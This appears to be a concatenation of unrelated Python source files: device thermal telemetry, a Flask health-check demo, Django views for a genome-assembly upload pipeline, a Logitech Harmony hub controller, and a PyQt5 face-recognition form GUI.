statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
health.py
|
import datetime
import time
import threading
import redis
from flask import Flask, jsonify
from random import randint
OK = 'OK'
app = Flask(__name__)
app.healthy = True
r = redis.Redis()
APP_NAME = "TESTABLE_HEALTH_APP"
def update_health(status):
if status:
r.setex(APP_NAME, 5, status)
else:
print(datetime.datetime.now().__str__() + " : HEALTH HAS FAILED")
r.delete(APP_NAME)
class ThreadingTest(object):
def __init__(self, interval=1):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
while True:
if randint(0,100) <= 1:
#raise Exception("Faking a database error.")
app.healthy = False
update_health(None)
time.sleep(30)
else:
update_health('Ok')
time.sleep(self.interval)
tr = ThreadingTest()
class InvalidUsage(Exception):
status_code = 400
def __init__(self, message, status_code=None, payload=None):
Exception.__init__(self)
self.message = message
if status_code is not None:
self.status_code = status_code
self.payload = payload
def to_dict(self):
rv = dict(self.payload or ())
rv['message'] = self.message
return rv
def do_work():
if not app.healthy:
raise Exception("Faking a database error.")
return {"status": "ok"}
@app.errorhandler(InvalidUsage)
def handle_invalid_usage(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/send/email', methods=['POST'])
def get_tasks():
try:
return_value = do_work()
update_health(OK)
return jsonify(return_value)
except:
update_health(None)
raise InvalidUsage("Database connection has failed.", status_code=500)
|
views.py
|
from django.shortcuts import render
from django.views.generic.edit import CreateView
from django.urls import reverse_lazy
from django.shortcuts import render
from django.http import HttpResponse
from genome_assembly.functions.functions import *
from genome_assembly.forms import *
from genome_assembly.genome_assembly_pipeline.pipeline import call_main
from genome_assembly.dummy_pipeline import dummy_pipeline
from uuid import uuid4
from threading import Thread
from genome_assembly.functions import env_switch
import os
# Create your views here.
#threading functions
def call_genomeAssembly_thread(filepath):
#print('calling the genome assembly pipeline')
env_switch.run_genomeAssembly(filepath)
def call_genePrediction_thread(filepath):
#print('calling the genome assembly pipeline')
env_switch.run_genePrediction(filepath)
def call_functionalAnnotation_thread(filepath):
#print('calling the genome assembly pipeline')
env_switch.run_functionalAnnotation(filepath)
def call_comparitiveGenomics_thread(filepath):
#print('calling the genome assembly pipeline')
env_switch.run_comparitiveGenomics(filepath)
def index(request):
return render(request, "genome_assembly/index.html")
#function to run the assembly
def run_assembly(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
ga = genome_assembly_form(request.POST, request.FILES)
if ga.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how to I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = ga_unzip_and_move(file_name, folder_name)
#call_main(i=filepath, S=True, l=True)
#calling the dummy pipeline here
t = Thread(target=call_genomeAssembly_thread, args=(filepath, ))
#t.setDaemon(True)
t.start()
#dummy_pipeline.call_main(filepath, ga=True)
#for the actual pipeline call, the helper funtion to change the environment will be given.
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfuly")
else:
print('form is not valid')
else:
ga = genome_assembly_form()
return render(request,"genome_assembly/genome_assembly.html",{'form':ga})
#function to run gene_prediction
def run_geneprediction(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
gp = gene_prediction_form(request.POST, request.FILES)
if gp.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how to I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = gp_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_genePrediction_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, gp=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfuly")
else:
print('form is not valid')
else:
gp = gene_prediction_form()
return render(request,"genome_assembly/gene_prediction.html",{'form':gp})
#function to run functional annotation
def run_functionalAnnotation(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
fa = functional_annotation_form(request.POST, request.FILES)
if fa.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how to I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = fa_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_functionalAnnotation_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, fa=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfuly")
else:
print('form is not valid')
else:
fa = functional_annotation_form()
return render(request,"genome_assembly/functional_annotation.html",{'form':fa})
#function to run functional annotation
def run_comparitiveGenomics(request):
#return render(request, "uploader/genome_assembly_form.html")
if request.method == 'POST':
cg = comparitive_genomics_form(request.POST, request.FILES)
if cg.is_valid():
#this is the place where I need to generate the ID and give it to the user
#instead of returning the http response, redirect the user to the page with the link to the output.
#how to I save the post information?
#figure out how to use models here
print(request.POST)
file_name = request.FILES['file']
handle_uploaded_file(request.FILES['file'])
#post to the model db here, get a uuid for that request and generate a folder in that name
folder_name = uuid4().hex[:15]
filepath = cg_unzip_and_move(file_name, folder_name)
#make the call to the pipeline here
#make the call to the dummy pipeline here.
t = Thread(target=call_comparitiveGenomics_thread, args=(filepath, ))
t.start()
#dummy_pipeline.call_main(filepath, cg=True)
#call_main(i=filepath, S=True, l=True)
#after this is called, this has to render something temp page
return HttpResponse("File uploaded successfuly")
else:
print('form is not valid')
else:
cg = comparitive_genomics_form()
return render(request,"genome_assembly/comparitive_genomics.html",{'form':cg})
#dynamic link generation - send the link to the folder as a variable in a dictionary, this has to be specific to each results page.
def results(request, variable):
print(variable)
filepath = 'genome_assembly/genome_assembly_data/' + variable
print(filepath)
rs_dict = {}
rs_dict['contig'] = filepath
rs_dict['quast'] = filepath
rs_dict['qc'] = filepath
#helper function to get the file of fasta and html (just do a .endswith)
return render(request, "genome_assembly/upload_success.html", {'data':rs_dict})
|
harmonyNode.py
|
#############################################
## harmonyNode
#############################################
print('Load harmonyNode.py')
import sys, os, io, time, traceback, threading, asyncio, json, importlib
path = os.path.join('/aioharmony', os.path.dirname(__file__))
sys.path.append(path)
path = os.path.join(os.path.dirname(__file__), '../../imports/network')
sys.path.append(path)
path = os.path.join(os.path.dirname(__file__), './hubs')
sys.path.append(path)
from aioharmony.harmonyapi import HarmonyAPI, SendCommandDevice
from aioharmony.const import ClientCallbackType, WEBSOCKETS, XMPP
import wsClient, aioharmony.__main__ as harmonyHub, harmonyOptions, noteTool
_hubOptions = {}
#############################################
async def setDevice(note):
#############################################
try:
zone = note['content'].get('zone', None)
if(harmonyOptions.hubs.get(zone, None) == None):
return print(f'Abort receivedNote, invalid zone: {zone}')
if(harmonyOptions.hubs[zone].get('config', None) == None):
client = await harmonyHub.get_client(harmonyOptions.hubs[zone]['ip'], WEBSOCKETS, False)
print(f"\t {json.dumps(client.json_config, sort_keys=True, indent=4)}")
class commandArgs:
device_id = 'Amazon Fire TV'
command = 'OK'
repeat_num = 1
hold_secs = 0
delay_secs = 0
await harmonyHub.send_command(client, commandArgs)
except:
print('Abort setDevice: ', sys.exc_info()[0])
traceback.print_exc()
#############################################
async def receivedNote(note, connection):
#############################################
try:
print(f' \n***receivedNote: {note}')
# validate zone
zone = note['content'].get('zone', None)
if(zone == None):
return print(f'Abort receivedNote, invalid zone: {zone}')
# validate ontrolWord
ontrolWord = note['content'].get('controlWord', None)
if(ontrolWord == None):
return print(f'Abort receivedNote, invalid ontrolWord: {ontrolWord}')
#validate hub
if(_hubOptions.get(zone, None) == None): _hubOptions[zone] = importlib.import_module(zone)
if(_hubOptions.get(zone, None) == None): return print(f'Abort receivedNote, invalid zone: {zone}')
options = _hubOptions[zone]
# validate controlCommand
controlCommand = options.controlWordMap.get(ontrolWord, None)
if(controlCommand == None):
return print(f'Abort receivedNote, invalid controlCommand for {ontrolWord}')
# validate connection
connection = getattr(options, 'connection', None)
if(connection == None):
hubIp = options.hubIp
connection = await harmonyHub.get_client(hubIp, WEBSOCKETS, False)
options.connection = connection
print(f"***Hub Config:\n{json.dumps(connection.json_config, sort_keys=True, indent=4)}")
print(json.dumps(connection.json_config, sort_keys=True, indent=4), file=open(f'/smartRemotes/{zone}.hubConfig', 'w'))
# send device control command
print(f' \n***Send controlCommand: {controlCommand}')
class properties:
if(controlCommand['deviceID'] == -1):
activity = controlCommand['command']
else:
device_id = controlCommand['deviceID']
command = controlCommand['command']
repeat_num = controlCommand['repeatNum']
hold_secs = controlCommand['holdSecs']
delay_secs = controlCommand['delaySecs']
if(controlCommand['deviceID'] == -1):
await harmonyHub.start_activity(connection, properties)
else:
await harmonyHub.send_command(connection, properties)
except:
print('Abort receivedNote: ', sys.exc_info()[0])
traceback.print_exc()
#############################################
async def hubConnected(connection):
#############################################
print(f' \n***hubConnected')
note = noteTool.publishNote('harmonyNode', 'subscribe', {
'title': 'control harmonyHub request'
})
await wsClient.deliverNote(note, connection)
print(f' \n***Wait for \'{note["content"]["title"]}\' notes...')
print(f'*********************************************************')
#############################################
## MAIN
#############################################
try:
time.sleep(3)
#Start wsClient Module
try:
thread = threading.Thread(target=wsClient.start, args=(harmonyOptions.wsClient,))
thread.start()
time.sleep(1)
except:
print('Abort run wsClient: ', sys.exc_info()[0])
traceback.print_exc()
except:
print('Abort zoneNode', sys.exc_info()[0])
traceback.print_exc()
|
gui.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QGraphicsDropShadowEffect
import process
from threading import Thread
import time
from process import loading,time_tk,limite
import json
from PIL import *
import os
import face_recognition as frc
import numpy as np
#Setting up the load class
limite = 100
class External(QtCore.QThread):
signal = QtCore.pyqtSignal(int)
signal_ = QtCore.pyqtSignal(int)
def run(self):
count = 0
while count < limite:
count += 1
time.sleep(0.01)
self.signal.emit(count)
count = 0
while count < process.limite:
time.sleep(process.time_tk[count])
count +=1
self.signal_.emit((count/process.limite)*100)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
global path
global path_2
path_2 = None
path = None
self.width = 1400
self.height = 720
MainWindow.resize(self.width,self.height)
MainWindow.setStyleSheet("background-color: rgb(24, 24, 24);")
self.color1 = QtGui.QColor(0, 0, 0)
self.color2 = QtGui.QColor(20, 182, 216)
self.color3 = QtGui.QColor(255, 40, 59)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
tab_font = QtGui.QFont(fontstr)
tab_font.setPointSize(10)
tab_font.setBold(False)
tab_font.setItalic(False)
tab_font.setWeight(5)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tabWidget.setObjectName("tabWidget")
self.tabWidget.setStyleSheet("QTabBar::tab {padding:5px;background-color:rgba(0,255,255,0.2);border:0.5px solid rgb(99, 255, 255);color:rgb(99, 255, 255)} QTabBar::tab:selected {background-color:rgba(0,255,255,0.4)}")
self.tabWidget.setFont(tab_font)
self.shadow_tab = QtWidgets.QGraphicsDropShadowEffect(self.tabWidget,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(99, 255, 255))
self.tabWidget.setGraphicsEffect(self.shadow_tab)
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tab_22 = QtWidgets.QWidget(self.tab_2)
self.tab_22.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tab_22.setObjectName("tab_22")
self.tab_22.setStyleSheet("#tab_22{border-image:url('./src/images/hud_n-1.png');background-attachment: fixed;}")
self.tabWidget.addTab(self.tab_2, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.tab_11 = QtWidgets.QWidget(self.tab)
self.tab_11.setGeometry(QtCore.QRect(0, 0, 1400,720))
self.tab_11.setObjectName("tab_11")
self.tab_11.setStyleSheet("#tab_11{border-image:url('./src/images/hud_.png');background-attachment: fixed;}")
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font1 = QtGui.QFont(fontstr)
font_ = QtGui.QFont(fontstr)
id = QtGui.QFontDatabase.addApplicationFont("./src/fonts/neuropolitical rg.ttf")
fontstr = QtGui.QFontDatabase.applicationFontFamilies(id)[0]
font_.setPointSize(15)
font_.setBold(False)
font_.setItalic(False)
font_.setWeight(5)
self.contact = QtWidgets.QLabel(self.tab)
self.contact.setText("Contact Informations :")
self.contact.setObjectName("text_contact")
self.contact.setGeometry(QtCore.QRect(750,10,600,100))
self.contact.setStyleSheet("#text_contact{background:transparent;color:rgb(99, 255, 255);}")
self.contact.setFont(font_)
self.shadow_con = QtWidgets.QGraphicsDropShadowEffect(self.contact,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.contact.setGraphicsEffect(self.shadow_con)
self.gen = QtWidgets.QLabel(self.tab)
self.gen.setText("General Informations :")
self.gen.setObjectName("text_contact")
self.gen.setGeometry(QtCore.QRect(60,10,600,100))
self.gen.setStyleSheet("#text_contact{background:transparent;color:rgb(99, 255, 255);}")
self.gen.setFont(font_)
self.shadow_con = QtWidgets.QGraphicsDropShadowEffect(self.gen,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.gen.setGraphicsEffect(self.shadow_con)
self.id_upload = QtWidgets.QPushButton(self.tab)
self.id_upload.setEnabled(True)
self.id_upload.setGeometry(QtCore.QRect(40, 100-30, 200, 200))
self.shadow_ = QtWidgets.QGraphicsDropShadowEffect(self.id_upload,blurRadius=40,xOffset=1,yOffset=1,color=QtGui.QColor(7, 179, 150))
self.id_upload.setObjectName("id_upload")
self.id_upload.setStyleSheet("#id_upload{background:transparent;border-image:url('./src/images/image-1.png');}")
self.id_upload.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.id_upload.setMouseTracking(True)
self.id_upload.setGraphicsEffect(self.shadow_)
self.id_upload.clicked.connect(self.img_select_2)
self.plainTextEdit_4 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_4.setGeometry(QtCore.QRect(240, 120, 201, 31))
self.plainTextEdit_4.setObjectName("plainTextEdit_4")
self.plainTextEdit_4.setStyleSheet("#plainTextEdit_4:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_4{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_4.setFont(font1)
self.plainTextEdit_4.setPlaceholderText("First Name")
self.plainTextEdit_2 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_2.setGeometry(QtCore.QRect(240, 210-30, 201, 31))
self.plainTextEdit_2.setObjectName("plainTextEdit_2")
self.plainTextEdit_2.setStyleSheet("#plainTextEdit_2:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_2{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_2.setFont(font1)
self.plainTextEdit_2.setPlaceholderText("Last Name")
self.plainTextEdit_5 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_5.setGeometry(QtCore.QRect(80, 300-30, 131, 31))
self.plainTextEdit_5.setObjectName("plainTextEdit_5")
self.plainTextEdit_5.setStyleSheet("#plainTextEdit_5:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_5{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_5.setFont(font1)
self.plainTextEdit_5.setPlaceholderText("Day")
self.plainTextEdit_9 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_9.setObjectName(u"plainTextEdit_9")
self.plainTextEdit_9.setGeometry(QtCore.QRect(240, 300-30, 131, 31))
self.plainTextEdit_9.setStyleSheet("#plainTextEdit_9:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_9{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_9.setFont(font1)
self.plainTextEdit_9.setPlaceholderText("Month")
self.plainTextEdit_55 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_55.setGeometry(QtCore.QRect(400, 300-30, 131, 31))
self.plainTextEdit_55.setObjectName("plainTextEdit_5")
self.plainTextEdit_55.setStyleSheet("#plainTextEdit_5:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_5{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_55.setFont(font1)
self.plainTextEdit_55.setPlaceholderText("Year")
self.plainTextEdit_3 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_3.setGeometry(QtCore.QRect(80, 350-30, 131, 31))
self.plainTextEdit_3.setObjectName("plainTextEdit_3")
self.plainTextEdit_3.setStyleSheet("#plainTextEdit_3:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_3{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_3.setFont(font1)
self.plainTextEdit_3.setPlaceholderText("Country")
self.plainTextEdit_6 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_6.setGeometry(QtCore.QRect(240, 350-30, 131, 31))
self.plainTextEdit_6.setObjectName("plainTextEdit_6")
self.plainTextEdit_6.setStyleSheet("#plainTextEdit_6:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_6{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_6.setFont(font1)
self.plainTextEdit_6.setPlaceholderText("City")
self.plainTextEdit = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit.setGeometry(QtCore.QRect(80, 400-30, 131, 31))
self.plainTextEdit.setObjectName("plainTextEdit")
self.plainTextEdit.setStyleSheet("#plainTextEdit:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit.setFont(font1)
self.plainTextEdit.setPlaceholderText("Gender")
self.plainTextEdit_10 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_10.setObjectName(u"plainTextEdit_10")
self.plainTextEdit_10.setGeometry(QtCore.QRect(80, 450-30, 291, 31))
self.plainTextEdit_10.setStyleSheet("#plainTextEdit_10:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_10{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_10.setFont(font1)
self.plainTextEdit_10.setPlaceholderText("Job")
self.plainTextEdit_11 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_11.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_11.setGeometry(QtCore.QRect(80, 500-30, 291, 31))
self.plainTextEdit_11.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_11.setFont(font1)
self.plainTextEdit_11.setPlaceholderText("Work location")
#CONTACT Informations
self.plainTextEdit_111 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_111.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_111.setGeometry(QtCore.QRect(800, 120, 291, 31))
self.plainTextEdit_111.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_111.setFont(font1)
self.plainTextEdit_111.setPlaceholderText("Phone Number 1")
self.plainTextEdit_222 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_222.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_222.setGeometry(QtCore.QRect(800, 170, 291, 31))
self.plainTextEdit_222.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_222.setFont(font1)
self.plainTextEdit_222.setPlaceholderText("Phone Number 2")
self.plainTextEdit_333 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_333.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_333.setGeometry(QtCore.QRect(800, 170+50, 291, 31))
self.plainTextEdit_333.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_333.setFont(font1)
self.plainTextEdit_333.setPlaceholderText("Email")
self.plainTextEdit_444 = QtWidgets.QLineEdit(self.tab)
self.plainTextEdit_444.setObjectName(u"plainTextEdit_11")
self.plainTextEdit_444.setGeometry(QtCore.QRect(800, 170+100, 491, 231))
self.plainTextEdit_444.setStyleSheet("#plainTextEdit_11:hover {background: rgba(0, 214, 252, 0.17);border-radius: 5px;}#plainTextEdit_11{background: rgba(0, 214, 252, 0.1);padding:5px;color:rgb(99, 255, 255);border: 1px solid rgb(20, 182, 216);border-radius:4px;border-color:rgb(20, 182, 216);}")
self.plainTextEdit_444.setFont(font1)
self.plainTextEdit_444.setPlaceholderText("Residence Address")
self.lab = QtWidgets.QLabel(self.tab_2)
self.lab.setEnabled(True)
self.lab.setObjectName("card")
self.lab.setGeometry(QtCore.QRect(910, 20, 470, 320))
self.lab.setStyleSheet("#card{background-color:rgba(0, 133, 57,0.2);border:1px solid green;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2 = QtWidgets.QLabel(self.tab_2)
self.lab2.setEnabled(True)
self.lab2.setObjectName("card2")
self.lab2.setGeometry(QtCore.QRect(910, 348, 470, 315))
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
self.frame = QtWidgets.QFrame(self.tab_2)
self.frame.setObjectName("frame")
self.frame.setGeometry(QtCore.QRect(0, 0, 0,0))
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setStyleSheet("#frame{background:transparent}")
self.frame_2 = QtWidgets.QFrame(self.frame)
self.frame_2.setObjectName(u"frame_2")
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.label = QtWidgets.QLabel(self.frame_2)
self.label.setObjectName("label")
self.frame2 = QtWidgets.QFrame(self.tab_2)
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.frame2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame2.setObjectName("frame2")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.frame2 = QtWidgets.QFrame(self.tab_2)
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.frame2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame2.setObjectName("frame2")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
font_noinfo = QtGui.QFont(fontstr)
font_noinfo.setPointSize(14)
font_noinfo.setBold(False)
font_noinfo.setItalic(False)
font_noinfo.setWeight(50)
self.label_noimg = QtWidgets.QLabel(self.lab)
self.label_noimg.setGeometry(QtCore.QRect(180,20,350,200))
self.label_noimg.setObjectName("label_noimg")
self.label_noimg.setText("NO IMAGE")
self.label_noimg.setStyleSheet("#label_noimg{background:transparent;color:rgba(0,255,68,0.6)}")
self.label_noimg.setFont(font_noinfo)
self.shadow_lab_ = QtWidgets.QGraphicsDropShadowEffect(self.label_noimg,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.label_noimg.setGraphicsEffect(self.shadow_lab_)
self.label_noimg2 = QtWidgets.QLabel(self.lab)
self.label_noimg2.setGeometry(QtCore.QRect(175,60,350,200))
self.label_noimg2.setObjectName("label_noimg")
self.label_noimg2.setText("AVAILABLE")
self.label_noimg2.setStyleSheet("#label_noimg{background:transparent;color:rgba(0,255,68,0.6)}")
self.label_noimg2.setFont(font_noinfo)
self.shadow_lab_2 = QtWidgets.QGraphicsDropShadowEffect(self.label_noimg2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 255, 98))
self.label_noimg2.setGraphicsEffect(self.shadow_lab_2)
self.label_noinfo = QtWidgets.QLabel(self.lab2)
self.label_noinfo.setGeometry(QtCore.QRect(140,0,300,300))
self.label_noinfo.setObjectName("label_noinfo")
self.label_noinfo.setText("NO INFORMATIONS")
self.label_noinfo.setStyleSheet("#label_noinfo{background:transparent;color:rgba(0,255,255,0.6)}")
self.label_noinfo.setFont(font_noinfo)
self.shadow_frame2_ = QtWidgets.QGraphicsDropShadowEffect(self.label_noinfo,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.label_noinfo.setGraphicsEffect(self.shadow_frame2_)
self.label_err_face = QtWidgets.QLabel(self.lab)
self.label_err_face.setObjectName("label_err_face")
self.label_err_face.setText("")
self.label_err_face.setStyleSheet("#label_err_face{background:transparent;color:rgba(255, 28, 51,0.9)}")
self.label_err_face.setFont(font_noinfo)
self.popup_icon_err_shadow = QtWidgets.QGraphicsDropShadowEffect(self.label_err_face,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(222, 18, 21))
self.label_err_face.setGraphicsEffect(self.popup_icon_err_shadow)
self.popup_icon_err = QtWidgets.QFrame(self.lab)
self.popup_icon_err.setObjectName("popup_icon_err")
